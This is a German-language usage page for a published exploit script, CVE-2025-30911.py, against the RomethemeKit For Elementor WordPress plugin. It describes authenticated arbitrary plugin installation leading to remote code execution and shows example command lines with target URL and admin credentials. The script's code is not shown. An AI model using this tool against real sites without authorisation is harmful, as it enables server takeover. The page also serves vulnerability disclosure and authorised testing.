
WordPress RomethemeKit For Elementor Plugin <= 1.5.4 ist anfällig für Remote Code Execution (RCE)
Dieses Skript nutzt eine kritische Schwachstelle im RomethemeKit For Elementor WordPress Plugin (<= v1.5.4) aus, die eine authentifizierte, willkürliche Installation und Aktivierung von Plugins ermöglicht, was potenziell zu Remote Code Execution (RCE) führen kann.
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:HDie Schwachstelle erlaubt einem authentifizierten Angreifer (mit Administratorzugriff), programmatisch jedes Plugin – einschließlich potenziell schädlicher – zu installieren und zu aktivieren, was zu einer vollständigen Codeausführung auf dem Server führen kann.
python3 CVE-2025-30911.py -u http://target/wordpress -un admin -p password -pl hello-dolly/hello.php
usage:
CVE-2025-30911.py [-h] -u URL -un USERNAME -p PASSWORD [-pl PLUGIN]
Exploit For CVE-2025-30911 | By Nxploited Khaled Alenazi
options:
-h, --help Show this help message and exit
-u, --url URL Base URL of the WordPress site
-un, --username USERNAME WordPress admin username
-p, --password PASSWORD WordPress admin password
-pl, --plugin PLUGIN Plugin to install (default: hello-dolly/hello.php)
python3 CVE-2025-30911.py -u http://192.168.100.74:888/wordpress -un admin -p admin -pl hello-dolly/hello.php
requests-Bibliothek (Installation via pip install requests)Dieses Tool wird nur für Bildungszwecke und autorisierte Sicherheitstests bereitgestellt. Nicht autorisierte Nutzung ist illegal und unethisch.
Von: Nxploited | Khaled Alenazi